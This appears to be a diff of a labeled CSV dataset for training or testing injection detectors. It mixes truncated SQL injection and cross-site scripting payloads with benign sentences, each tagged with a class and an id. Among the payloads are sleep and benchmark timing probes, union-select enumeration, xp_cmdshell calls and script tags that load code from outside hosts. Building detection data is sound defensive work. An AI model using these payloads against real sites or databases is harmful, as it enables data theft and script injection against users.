6237,7469 ) > ( select count ( * ",2,SQLi,20335 +"<t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT",1,XSS,9766 +"1%"" ) ) procedure analyse ( extractvalue ( 9255,co",2,SQLi,22385 +48e71%3balert(1)//503466e3,1,XSS,9738 +"1%"" ) ) ) and 3116 = 9088#",2,SQLi,14161 +It comes as no surprise therefore to see Select la,0,normal,25973 +select * from users where id = 1 or \<\. or 1 = 1 ,2,SQLi,11615 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3136 +<audio onpointerup=alert(1)>XSS</audio>,1,XSS,4267 +"1%"" ) rlike sleep ( 5 ) #",2,SQLi,15332 +"<form onkeydown=""alert(1)"" contenteditable>test</f",1,XSS,7975 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4680 +"1"" where 2235 = 2235 union all select null,null,nu",2,SQLi,20981 +1' ) ) ) and 6537 = dbms_pipe.receive_message ( ch,2,SQLi,13323 +1 ) ) ) and 6537 = dbms_pipe.receive_message ( chr,2,SQLi,22202 +"1 where 4448 = 4448 union all select null,null,nul",2,SQLi,16249 +"select * from users where id = 1 or ""?%"" or 1 = 1 ",2,SQLi,11883 +"1"" or 7552 = ( select count ( * ) from rdb$fields ",2,SQLi,22308 +<video id=x controls onfocusin=alert(1)><source sr,1,XSS,7065 +"<command draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,4666 "1"" ) ) as rhea where 2982 = 2982 or ( select * fro",2,SQLi,20337 -<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPA,1,XSS,9764 -1' ) where 8274 = 8274,2,SQLi,21138 -%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%6,1,XSS,9736 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,14159 -"-5066' ) ) union all select 9689,9689,9689,9689#",2,SQLi,20496 -select * from users where id = '1' or 1^ = 1 union,2,SQLi,11613 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3134 -<custom tags onpointerdown=alert(1)>XSS</custom ta,1,XSS,4265 -"1"" ) ) and row ( 6237,7469 ) > ( select count ( * ",2,SQLi,15330 -"<input onmouseup=""alert(1)"">test</input>",1,XSS,7973 -"<div onmouseenter=""alert(1)"">test</div>",1,XSS,4678 --6086' ) ) or ( 6719 = 7280 ) *7280 and ( ( 'ozbj',2,SQLi,20983 -1'+ ( select gajr where 6653 = 6653 union all sele,2,SQLi,13321 -"-4686"" ) as dxks where 7123 = 7123 or elt ( 1032 =",2,SQLi,22204 -1%' ) ) ) rlike sleep ( 5 ) and ( ( ( '%' = ',2,SQLi,16247 -""" or sleep ( __TIME__ ) #",2,SQLi,11881 -Select a color palette for the artwork.,0,normal,24231 -"<keygen draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,7063 -"<style>@keyframes x{}</style><sub style=""animation",1,XSS,4664 --7037' ) ) as epsg where 3684 = 3684 union all sel,2,SQLi,20339 -hour,0,normal,23203 -"<plaintext draggable=""true"" ondragstart=""alert(1)""",1,XSS,2368 -"According to 9to5Mac, here's how to solve your pro",0,normal,26413 -"<script>$=~[];$={___:++$,$$$$:(![]+"""")[$],__$:++$,",1,XSS,9722 -1' ) ) ) rlike sleep ( 5 ) #,2,SQLi,13929 -1' ) and 4386 = utl_inaddr.get_host_address ( chr ,2,SQLi,21691 -"1%"" ) and 8514 = ( select count ( * ) from domain.",2,SQLi,16825 -"1' and 3824 = benchmark ( 5000000,md5 ( 0x76555642",2,SQLi,14307 -1' ) or 2633 = dbms_pipe.receive_message ( chr ( 1,2,SQLi,16143 -The number of these select members is small in com,0,normal,25404 -Select your captain.,0,normal,24837 -"-6632 ) union all select 4073,4073,4073,4073,4073,",2,SQLi,12885 --6190' ) ) ) union all select 9413--,2,SQLi,15402 -"For this reason, select toys that don't have small",0,normal,26170 -"-3954' ) ) union all select 2417,2417--",2,SQLi,14311 -1 ) ) ) or 7552 = ( select count ( * ) from rdb$fi,2,SQLi,17609 -"<bgsound SRC=""javascript:document.vulnerable=true;",1,XSS,1491 -<style onpointerenter=alert(1)>XSS</style>,1,XSS,3248 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6850 -"-4811' ) ) ) union all select 4603,4603,4603,4603,",2,SQLi,19863 -"&lt;IMG SRC=`javascript:alert(&quot;RSnake says, &",1,XSS,1426 -"1"" ) ) and 4241 = convert ( int, ( select char ( 1",2,SQLi,20348 -"{""id"":null,""name"":""Groudon""}",0,normal,27366 -"<progress draggable=""true"" ondragstart=""alert(1)"">",1,XSS,2692 -"-2745' ) or elt ( 1032 = 1032,3623 ) and ( 'vfxq' ",2,SQLi,19479 -select current_setting('log_connections');,2,SQLi,22504 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10442 -"If you have never used down pillows before, the fo",0,normal,26047 -millisecond,0,normal,23242 -"<template draggable=""true"" ondragstart=""alert(1)"">",1,XSS,6844 -"1' ) ) ) and make_set ( 6094 = 2929,2929 ) and ( (",2,SQLi,16623 -"1%' and 3202 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,13086 -"1"" ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4",2,SQLi,15009 -"<template ondblclick=""alert(1)"">test</template>",1,XSS,8573 -"<div id=""88""><svg xmlns=""http://www.w3.org/2000/sv",1,XSS,9149 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10814 -Levi's: Save up to 30% on select styles until Nove,0,normal,25909 -!'/</title/'/</style/</script/</textarea/--><p onc,1,XSS,9553 -"<hgroup onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,3197 -"1' and elt ( 4249 = 4249,7259 ) and 'pgvz' = 'pgvz",2,SQLi,14501 +Select your drift.,0,normal,25024 +"<tfoot onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,2369 +"According to the report, there were 12 potential l",0,normal,26410 +<script ~~~>confirm(1)</script ~~~>,1,XSS,9724 +"-6007"" ) ) union all select 6019,6019,6019,6019,60",2,SQLi,13931 +1' where 6853 = 6853 or exp ( ~ ( select * from ( ,2,SQLi,21689 +"-8686"" where 4532 = 4532 or elt ( 3301 = 9065,9065",2,SQLi,16827 +1' ) where 4729 = 4729,2,SQLi,14309 +1' ) and sleep ( 5 ) and ( 'orxt' = 'orxt,2,SQLi,16145 +"The organizers will select 10 finalists, which wil",0,normal,25401 +Select your strategy.,0,normal,24834 +"-9934"" ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr",2,SQLi,12887 +"-4653' or 1 group by concat ( 0x7171706a71, ( sele",2,SQLi,15404 +"For years, Kentucky had held a primary to select a",0,normal,26167 +1'+ ( select 'njee' where 4101 = 4101 and 3090 = 7,2,SQLi,14313 +1 ) ( select ( case when ( 5451 = 5451 ) then rege,2,SQLi,17611 +"<br SIZE=""&{document.vulnerable=true}"">",1,XSS,1492 +<style>@keyframes slidein {}</style><spacer style=,1,XSS,3250 +"<tfoot draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,6852 +"1' ) and make_set ( 9961 = 6559,6559 ) and ( 'exde",2,SQLi,19861 +&lt;IMG SRC=javascript:alert(String.fromCharCode(8,1,XSS,1427 +1' ) and 7533 = 7533 and ( 'xyga' like 'xyga,2,SQLi,20346 +1 ) where 5598 = 5598 and 3707 = ( select count ( ,2,SQLi,21555 +<s id=x tabindex=1 ondeactivate=alert(1)></s><inpu,1,XSS,2693 +"1"" ) or exp ( ~ ( select * from ( select concat ( ",2,SQLi,19477 +1 ) as drbw where 2380 = 2380 or 8466 = benchmark ,2,SQLi,18964 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10444 +If you want a more detailed explanation of the pro,0,normal,26044 +He got the House to set up a select committee to p,0,normal,26120 +<var id=x tabindex=1 onbeforeactivate=alert(1)></v,1,XSS,6846 +"1"" ) ) ) and 7533 = 7533 and ( ( ( ""xopd"" = ""xopd",2,SQLi,16625 +1' ) ) ) or char ( 119 ) ||char ( 100 ) ||char ( 9,2,SQLi,13088 +1 ) and 3707 = ( select count ( * ) from sysibm.sy,2,SQLi,15011 +"<pre onpaste=""alert(1)"" contenteditable>test</pre>",1,XSS,8575 +"<div id=""90""><!-- Up to Opera 10.63 -->",1,XSS,9151 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10816 +Select a fragrance for your sanctuary.,0,normal,24076 +></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,1,XSS,9555 +"<body ondblclick=""alert(1)"">test</body>",1,XSS,3199 +select ( case when ( 3681 = 5026 ) then 3681 else ,2,SQLi,14503 "ABC<div style=""x:\xE2\x80\x83expression(javascript",1,XSS,487 -"1"" ) ) union all select null,null,null,null,null,n",2,SQLi,15909 -"<iframe onLoad iframe onLoad=""javascript:javascrip",1,XSS,371 -<embed code=%(scriptlet)s></embed>,1,XSS,784 -"<bdi onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,6383 --4215 ) where 5782 = 5782 or 2724 in ( ( char ( 11,2,SQLi,22430 -"Select ""Name,"" also at the top of the next tab.",0,normal,25675 -"-8651"" ) where 8391 = 8391 union all select 8391,8",2,SQLi,16683 -"1"" ) ) as xhat where 6674 = 6674 union all select ",2,SQLi,17258 --6397%' or 4493 = utl_inaddr.get_host_address ( ch,2,SQLi,16530 -<nextid onpointermove=alert(1)>XSS</nextid>,1,XSS,2048 +1'+ ( select 'ejox' where 2719 = 2719 union all se,2,SQLi,15911 +"<iframe onLoad iframe onLoad=""javascript:javascrip",1,XSS,371 +<embed code=%(scriptlet)s></embed>,1,XSS,784 +"<body onclick=""alert(1)"">test</body>",1,XSS,6385 +Select your declare.,0,normal,24956 +Order a margherita slice.,0,normal,22735 +"1"" ) where 7840 = 7840 union all select null,null#",2,SQLi,16685 +"1%"" ) ) and 5556 = ( select count ( * ) from all_u",2,SQLi,17260 +1' ) ) as rxxd where 5049 = 5049,2,SQLi,16532 +<discard onpointerenter=alert(1)>XSS</discard>,1,XSS,2049 <body ontouchend=alert(1)>,1,XSS,105 -Select the correct path.,0,normal,24309 --2869' ) ) union all select 3216--,2,SQLi,13267 -<b onblur=alert(1) tabindex=1 id=x></b><input auto,1,XSS,5685 -"<track draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,3633 --8652' ) or 4747 = dbms_utility.sqlid_to_sqlhash (,2,SQLi,16494 -"1"" ) ) and updatexml ( 3393,concat ( 0x2e,0x717170",2,SQLi,13090 -1%' ) ) and char ( 107 ) ||char ( 121 ) ||char ( 9,2,SQLi,15894 -"select * from users where id = 1 or ""$_"" or 1 = 1 ",2,SQLi,11657 -I can still remember the glee with which we demoli,0,normal,26073 -Locate items where applicable.,0,normal,23282 -end and ( ( 'eqoc' like 'eqoc,2,SQLi,12664 +1'|| ( select 'bhxx' where 2585 = 2585,2,SQLi,22247 +1' ) where 8429 = 8429,2,SQLi,13269 +<svg><dialog onload=alert(1)></dialog>,1,XSS,5687 +"<param onmouseleave=""alert(1)"">test</param>",1,XSS,3635 +1'|| ( select 'kfyh' where 4737 = 4737 or row ( 10,2,SQLi,16496 +1' ) and 8635 = ( select count ( * ) from generate,2,SQLi,13092 +-4828%' ) or 8678 = 5745#,2,SQLi,15896 +a' or 1 = 1--,2,SQLi,11659 +"1%' or 6979 = like ( 'abcdefg',upper ( hex ( rando",2,SQLi,22179 +"elt ( 8192 = 8192,sleep ( 5 ) )",2,SQLi,18600 +"-6076"" ) ) or 8277 = 4757",2,SQLi,12666 "<img src\x00=x onerror=""javascript:alert(1)"">",1,XSS,670 -1' and ( select * from ( select ( sleep ( 5 ) ) ) ,2,SQLi,18458 -"1' or extractvalue ( 1297,concat ( 0x5c,0x7171706a",2,SQLi,18971 -"1' in boolean mode ) and updatexml ( 3393,concat (",2,SQLi,20469 -select,0,normal,26580 -select * from users where id = 1 + \+*\ union sele,2,SQLi,11635 -&lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&,1,XSS,1440 -""") and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,11040 -"Marsden, Select Pleas in the Court of Admiralty, p",0,normal,25890 -"1%"" ) ) and ( select 2* ( if ( ( select * from ( s",2,SQLi,19549 -"<ins onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,4812 -"<rp draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,3259 -To unlock nokia mobile phones you should select th,0,normal,25253 -"1%"" ) ) ) or ( select 2* ( if ( ( select * from ( ",2,SQLi,19445 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,19883 +1'+ ( select biqo where 6046 = 6046,2,SQLi,18456 +"-8054' ) ) union all select 5232,5232,5232,5232,52",2,SQLi,18969 +1'|| ( select 'scqw' where 3337 = 3337 or 7427 = d,2,SQLi,19266 +select,0,normal,26577 +", exec master..xp_cmdshell",2,SQLi,11637 +perl -e &apos;print &quot;&lt;IMG SRC=java\0script,1,XSS,1441 +""") and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,11042 +"Max Read, the former editor of Gawker, will lead S",0,normal,25887 +1 and 8398 = 1891-- naov,2,SQLi,19547 +"<nobr oncut=""alert(1)"" contenteditable>test</nobr>",1,XSS,4814 +<ins onfocusout=alert(1) tabindex=1 id=x></ins><in,1,XSS,3261 +1' ) as idqc where 5288 = 5288 and elt ( 1210 = 12,2,SQLi,22405 +Select Settings —> Apps —-> App Settings —> Show A,0,normal,25612 +1'|| ( select 'zqdn' where 6194 = 6194 union all s,2,SQLi,21230 "{""id"":null,""name"":""Shroomish""}",0,normal,27374 -"-9904"" ) ) union all select 9080,9080,9080,9080,90",2,SQLi,16058 -"During deposition, Trump has admitted that he did ",0,normal,26223 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7333 -&lt;/br style=a:expression(alert())&gt;,1,XSS,1565 --2214' ) union all select 8228#,2,SQLi,18219 -"1"" ) ) as dpln where 4193 = 4193 rlike sleep ( 5 )",2,SQLi,21319 --1676'|| ( select 'xzmu' from dual where 6373 = 63,2,SQLi,14923 -",drop table temp --",2,SQLi,11761 -or '1'='1'#,2,SQLi,9966 -"1' ) or updatexml ( 1808,concat ( 0x2e,0x7171706a7",2,SQLi,16806 -Select the PRIVACY tab and change your settings to,0,normal,25586 -Sort the playing cards.,0,normal,22562 -Select ingredients.,0,normal,24491 -"1' ) ) and make_set ( 8403 = 8403,8899 ) and ( ( '",2,SQLi,18657 -"{""id"":null,""firstName"":""Chai"",""lastName"":""Kon Moi""",0,normal,26746 -1 ) as hvsk where 7902 = 7902,2,SQLi,14175 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3004 -"select * from users where id = 1 or 1#""@ union sel",2,SQLi,11979 -"select * from users where id = 1 or "";_"" or 1 = 1 ",2,SQLi,11717 -<cite onfocusout=alert(1) tabindex=1 id=x></cite><,1,XSS,5390 -"select * from users where id = 1 or "",?"" or 1 = 1 ",2,SQLi,12056 -1 where 7890 = 7890 or sleep ( 5 ) --,2,SQLi,21477 -<script>var var = 1; alert(var)</script>,1,XSS,1310 -(sleep(5))--,2,SQLi,11346 -"1"" ) ) as vbdo where 3882 = 3882",2,SQLi,17174 -Select race.,0,normal,24710 -He is stopping in for a coffee at Café Select.,0,normal,26117 -1'|| ( select 'puco' where 2605 = 2605 union all s,2,SQLi,21667 -"<i onkeypress=""alert(1)"" contenteditable>test</i>",1,XSS,2515 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,12578 -1,0,normal,26691 -"1"" ) ) as tjdz where 8656 = 8656 union all select ",2,SQLi,15755 -"-7559"" or 8792 = 6905--",2,SQLi,14246 -"1"" or 8384 = like ( 'abcdefg',upper ( hex ( random",2,SQLi,21362 -<script src=//brutelogic.com.br/1.js>,1,XSS,9259 -He also edited Gregory Lewis Way's translation of ,0,normal,26125 -<style>:target {color: red;}</style><source id=x s,1,XSS,8792 -Select the ideal time.,0,normal,24290 -select ( case when ( 8331 = 5625 ) then 8331 else ,2,SQLi,12882 -"AND ELT(1337=1337,SLEEP(5)) AND '1337'='1337",2,SQLi,11250 -><script+src=https://cse.google.com/api/0076270247,1,XSS,9778 -1'|| ( select 'yezk' where 2097 = 2097,2,SQLi,19940 -Select your vary.,0,normal,25041 -"<Video> <source onerror = ""javascript: alert ()"">",1,XSS,5258 -1' ) ) rlike ( select * from ( select ( sleep ( 5 ,2,SQLi,13933 -"-1550' in boolean mode ) union all select 9777,977",2,SQLi,19647 -1'+ ( select ummn where 8883 = 8883 and 4241 = con,2,SQLi,18460 -"1%"" ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,19931 --2129' ) or 2724 in ( ( char ( 113 ) +char ( 113 ),2,SQLi,22018 -"<picture onclick=""alert(1)"">test</picture>",1,XSS,3302 -"Select wallpapers will be $211-$227 per panel, and",0,normal,25571 -select * from users where id = 1 <@. union select ,2,SQLi,12042 -<content id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,5407 +1 ) ) or 5356 = ( select count ( * ) from sysusers,2,SQLi,16060 +Each year we offer a select number of summer inter,0,normal,26220 +"<td draggable=""true"" ondragstart=""alert(1)"">test</",1,XSS,7335 +&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;,1,XSS,1566 +"1 ) ) ) and 8148 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,18221 +"1"" ) where 9086 = 9086 or sleep ( 5 ) #",2,SQLi,21317 +-7611 ) as tuje where 6101 = 6101 union all select,2,SQLi,14925 +", exec master..xp_cmdshell 'ping 10.10.1.2'--",2,SQLi,11763 +or 1=1,2,SQLi,9968 +1%' ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( ,2,SQLi,16808 +Select a color palette for the design.,0,normal,24107 +"-4826 union all select 4532,4532,4532,4532,4532--",2,SQLi,19274 +"-1275"" union all select 7861,7861,7861,7861,7861#",2,SQLi,19674 +-4595' ) where 4892 = 4892 order by 1--,2,SQLi,18655 +1,0,normal,26743 +-7453' ) ) ) or 8571 = 8571--,2,SQLi,14177 +"<article onmouseleave=""alert(1)"">test</article>",1,XSS,3005 +select * from users where id = '1'<@$$ union selec,2,SQLi,11981 +"select * from users where id = 1 union select @ $,",2,SQLi,11719 +"<em draggable=""true"" ondragstart=""alert(1)"">test</",1,XSS,5392 +select * from users where id = '1' or ( 1 ) = 1 un,2,SQLi,12058 +"{""id"":null,""firstName"":""Huang Soon"",""lastName"":""Th",0,normal,27200 +"<?='<SCRIPT>alert(""XSS"")</SCRIPT>'?>",1,XSS,1311 +;sleep 5--,2,SQLi,11348 +-7164%' or 4747 = dbms_utility.sqlid_to_sqlhash ( ,2,SQLi,17176 +This subject had been handed over in 18 9 3 to a r,0,normal,25295 +He pointed out that the performance of the Consume,0,normal,26114 +-8933 ) as iiyr where 1974 = 1974 union all select,2,SQLi,21665 +"<span draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,2516 +-2573 ) ) order by 1#,2,SQLi,12580 +"She asked, ""When is our dinner date?""",0,normal,22926 +"-3633' ) where 3513 = 3513 union all select 3513,3",2,SQLi,15757 +"iif ( 8354 = 3515,1,1/0 )",2,SQLi,14248 +"{""id"":null,""firstName"":""Tan"",""lastName"":""Wee"",""spe",0,normal,27265 +"<script/src=""data:&comma;eval(atob(location.hash.s",1,XSS,9261 +"He evinced, as premier of the Cape Colony, the sam",0,normal,26122 +<style>:target {transform: rotate(180deg);}</style,1,XSS,8794 +Randomly select a card.,0,normal,24287 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,12884 +")) AND ELT(1337=1337,SLEEP(5)) AND (('1337' LIKE '",2,SQLi,11252 +><script+src=https://www.blogger.com/feeds/5578653,1,XSS,9780 +1 where 9752 = 9752,2,SQLi,19938 +( select ( case when ( 9066 = 5598 ) then 1 else 9,2,SQLi,20257 +<isindex type=image src=1 onerror=alert()>,1,XSS,5260 +1' ) ) or 8315 = ( select count ( * ) from sysibm.,2,SQLi,13935 +"-1235"" ) ) or 4144 = ( select upper ( xmltype ( ch",2,SQLi,19667 +1' and ( select * from ( select ( sleep ( 5 ) ) ) ,2,SQLi,18458 +1' in boolean mode ) or 1022 = ( select count ( * ,2,SQLi,19929 +"1"" ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4",2,SQLi,22016 +"<time draggable=""true"" ondrag=""alert(1)"">test</tim",1,XSS,3304 +Select your answer ----------------- cell wall nuc,0,normal,25568 +select * from users where id = '1' + ( \. ) union ,2,SQLi,12044 +<fieldset onpointerdown=alert(1)>XSS</fieldset>,1,XSS,5409 <script>ReferenceError.prototype.__defineGetter__(,1,XSS,713 -<style>:target {color:red;}</style><dl id=x style=,1,XSS,5784 -"<b draggable=""true"" ondrag=""alert(1)"">test</b>",1,XSS,4410 -"select * from users where id = 1 or ""& ) "" or 1 = ",2,SQLi,11689 -"<track onkeyup=""alert(1)"" contenteditable>test</tr",1,XSS,5921 -Select the best camera settings for the shot.,0,normal,24104 -He ordered a meal from his favorite restaurant.,0,normal,23890 -<section id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,5412 -Where's the beach?,0,normal,23515 -"1"" ) ) ) or 8421 = ( select count ( * ) from gener",2,SQLi,16935 -"1"" ) and 3202 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,20010 -<nobr onfocusout=alert(1) tabindex=1 id=x></nobr><,1,XSS,3242 -Update the software version.,0,normal,22634 -1' where 6533 = 6533,2,SQLi,20845 -<tbody onfocusout=alert(1) tabindex=1 id=x></tbody,1,XSS,8494 -Select your consider.,0,normal,24975 -<textarea id=ta onfocus=%22write('<script>alert(1),1,XSS,9322 -create or replace function sleep ( int ) returns i,2,SQLi,21974 -"1' where 7190 = 7190 and 8148 = like ( 'abcdefg',u",2,SQLi,19258 -<br onpointerenter=alert(1)>XSS</br>,1,XSS,8445 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11110 -"1"" and make_set ( 8403 = 8403,8899 )",2,SQLi,14512 -"-3596' ) union all select 5349,5349,5349,5349,5349",2,SQLi,12232 -He decided to order a vegetarian meal.,0,normal,22924 -<input onpointerover=alert(1)>XSS</input>,1,XSS,7293 -<svg><col onload=alert(1)></col>,1,XSS,3672 -1%' ) and 8594 = ( select 8594 from pg_sleep ( 5 ),2,SQLi,18827 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10630 -Select your ask.,0,normal,24965 -select ( case when ( 7990 = 7627 ) then 7990 else ,2,SQLi,17189 -"<frameset onmouseleave=""alert(1)"">test</frameset>",1,XSS,8941 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,17594 -1' ) where 2725 = 2725 and 9254 = ( select count (,2,SQLi,19593 -Select shine.,0,normal,24678 -<embed src=1 onerror=alert(1) type=image/gif>,1,XSS,2935 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10795 -"-3566' where 3641 = 3641 union all select 3641,364",2,SQLi,15308 -"<SCRIPT DEFER>alert("""")</SCRIPT>",1,XSS,4312 -"1%' union all select null,null,null,null,null,null",2,SQLi,14692 -"<body onmouseleave=""alert(1)"">test</body>",1,XSS,6598 -"{""id"":null,""name"":""Hitmonlee""}",0,normal,26802 --6222 ) ) or 4493 = utl_inaddr.get_host_address ( ,2,SQLi,12490 -Whole Foods and Amazon announced that select organ,0,normal,25126 -"1"" ) ) ) union all select null,null,null,null,null",2,SQLi,20630 -"1%"" and sleep ( 5 ) #",2,SQLi,21964 -Select a class to take for self-improvement.,0,normal,23996 --9509' ) ) ) or 1091 = 5477 and ( ( ( 'gsmz' = 'gs,2,SQLi,16441 -<col id=x tabindex=1 onbeforeactivate=alert(1)></c,1,XSS,3413 -"SLEEP(1)/*' or SLEEP(1) or '"" or SLEEP(1) or ""*/",2,SQLi,10417 -<applet onReadyStateChange applet onReadyStateChan,1,XSS,401 -<aside onpointerup=alert(1)>XSS</aside>,1,XSS,2987 -1'+ ( select 'nlvq' where 7528 = 7528 or ( select ,2,SQLi,12765 -"-2333' union all select 9714,9714,9714--",2,SQLi,16044 -ORDER BY 10--,2,SQLi,10252 -"<applet onmouseup=""alert(1)"">test</applet>",1,XSS,6606 -"{""id"":null,""name"":""Heatran""}",0,normal,26900 -"1"" and elt ( 1210 = 1210,sleep ( 5 ) ) and ""phcl"" ",2,SQLi,20838 -"-9434"" ) as cqlw where 1600 = 1600 or 2733 = 1047-",2,SQLi,20633 -1' ) as lewd where 3118 = 3118 order by 1--,2,SQLi,12665 -"<span onkeyup=""alert(1)"" contenteditable>test</spa",1,XSS,6555 -"<wbr draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,8781 -Where's the townhouse?,0,normal,23561 -"1 ) and 8148 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,20673 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10798 -<menuitem id=x tabindex=1 onactivate=alert(1)></me,1,XSS,5782 -1' ) as llug where 2244 = 2244 and 3715 in ( ( cha,2,SQLi,12242 -Select a topic for the research paper.,0,normal,24169 -1 ) ) or 4411 = ( select count ( * ) from sysusers,2,SQLi,18471 -Where's your SQL assistance?,0,normal,23409 -"<section onmousemove=""alert(1)"">test</section>",1,XSS,7234 -"{""id"":null,""firstName"":""Jiamin"",""lastName"":""Wang"",",0,normal,27142 -1%' ) ) and 7160 = 7249--,2,SQLi,21033 -select * from users where id = '1' union select $[,2,SQLi,11737 -"<a href=""\x04javascript:javascript:alert(1)"" id=""f",1,XSS,520 -"<rtc draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,1756 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4509 -"Enter your 4-digit pin, select the ' PIN Services ",0,normal,26214 -"1"" rlike sleep ( 5 ) and ""veub"" = ""veub",2,SQLi,12920 -"1%"" ) ) ) or 7427 = dbms_pipe.receive_message ( ch",2,SQLi,20730 -"1%"" ) ) and char ( 111 ) ||char ( 77 ) ||char ( 12",2,SQLi,16110 -"<article onpaste=""alert(1)"" contenteditable>test</",1,XSS,5264 -&#x3c,1,XSS,1070 -"1"" or 9643 = ( select count ( * ) from domain.doma",2,SQLi,15185 -"<video onkeydown=""alert(1)"" contenteditable>test</",1,XSS,8420 -"1"" or ( select * from ( select ( sleep ( 5 ) ) ) s",2,SQLi,17464 -select sleep ( 5 ) and '%' = ',2,SQLi,20862 -"<img src\x13=x onerror=""javascript:alert(1)"">",1,XSS,666 -"1 ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr (",2,SQLi,21049 -"-4045 union all select 6857,6857,6857,6857,6857,68",2,SQLi,13797 -Associations could self-select by accepting only b,0,normal,26344 -1,0,normal,26716 -"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><!",1,XSS,1700 -"iif ( 7889 = 5114,1,1/0 )",2,SQLi,12165 -select ( case when ( 8113 = 8981 ) then 8113 else ,2,SQLi,18262 -"-6368 ) ) union all select 4646,4646,4646,4646,464",2,SQLi,20989 -Carefully select items.,0,normal,24439 -<br onpointerup=alert(1)>XSS</br>,1,XSS,4917 -"<image onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,7066 -<form id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,2980 -"1%"" ) ) ) and ( select 9067 from ( select count ( ",2,SQLi,19572 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,13751 -`'><script>\xE534\xA0\x8Ejavascript:alert(534)</sc,1,XSS,8991 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6862 -<object onpointerdown=alert(1)>XSS</object>,1,XSS,8169 -1%' ) ) and 4595 = 4595#,2,SQLi,18670 -"<isindex onmouseleave=""alert(1)"">test</isindex>",1,XSS,8129 -inner,0,normal,23115 -"1%' union all select null,null,null,null,null,null",2,SQLi,13645 -"1',updatexml ( 2917,concat ( 0x2e,0x7171706a71, ( ",2,SQLi,16476 -Where's the nail salon?,0,normal,23618 -<source id=x tabindex=1 onfocusin=alert(1)></sourc,1,XSS,8385 -<style>@keyframes slidein {}</style><plaintext sty,1,XSS,5247 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,13465 -1,0,normal,26673 -"<i onmouseout=""alert(1)"">test</i>",1,XSS,3897 -"iif ( 1095 = 2853,1,1/0 )",2,SQLi,17734 -<IMG SRC=�jav ascript:alert(�XSS�);�>,1,XSS,1722 -I want to select a book to read.,0,normal,23897 -"<style>@keyframes x{}</style><time style=""animatio",1,XSS,3778 -1 where 3535 = 3535 and 3580 = ( select count ( * ,2,SQLi,16743 -"-5539"" ) union all select 6189,6189,6189,6189,6189",2,SQLi,15211 -1 ) ) as fmpr where 3103 = 3103 and elt ( 9970 = 9,2,SQLi,15723 -"1 ) ) ) union all select null,null--",2,SQLi,21462 -<kbd onpointerenter=alert(1)>XSS</kbd>,1,XSS,4051 -Katie had been helping her select clothing and she,0,normal,25924 -1'|| ( select 'cclo' from dual where 6823 = 6823 a,2,SQLi,12281 -"1 ) or row ( 1045,7562 ) > ( select count ( * ) ,c",2,SQLi,13895 -<rb onblur=alert(1) tabindex=1 id=x></rb><input au,1,XSS,7706 -1' ) ) ) and 5934 = 2309,2,SQLi,20083 -1' ) ) as kahn where 1361 = 1361 or ( select * fro,2,SQLi,12230 -<canvas onpointerleave=alert(1)>XSS</canvas>,1,XSS,7106 -"<rb onmouseup=""alert(1)"">test</rb>",1,XSS,6373 -"<style>@keyframes slidein {}</style><thead style=""",1,XSS,7245 -"admin"" or ""1"" = ""1""#",2,SQLi,11878 -"<div draggable=""true"" 